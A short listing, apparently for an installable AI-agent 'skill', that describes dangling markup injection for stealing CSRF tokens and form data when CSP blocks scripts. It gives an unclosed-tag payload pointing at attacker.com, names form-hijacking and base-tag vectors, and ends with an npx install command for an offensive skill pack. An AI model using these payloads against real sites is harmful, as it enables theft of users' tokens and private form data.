When CSP blocks your XSS or sanitizers strip event handlers, dangling markup lets you exfiltrate CSRF tokens and sensitive form data without executing JavaScript. You inject an unclosed HTML tag like `<img src="https://attacker.com/collect?` and let the browser consume everything after it until the next matching quote, turning hidden inputs and page content into URL parameters sent to your server. Chrome has mitigated some vectors since version 60, but form action hijacking and base tag poisoning still work across browsers. The skill covers seven exfiltration techniques, browser-specific quirks, and tactical combinations with CSRF and cache poisoning attacks. It's niche but essential when you hit that "HTML injection but no script execution" wall.
npx skills add https://github.com/yaklang/hack-skills --skill dangling-markup-injection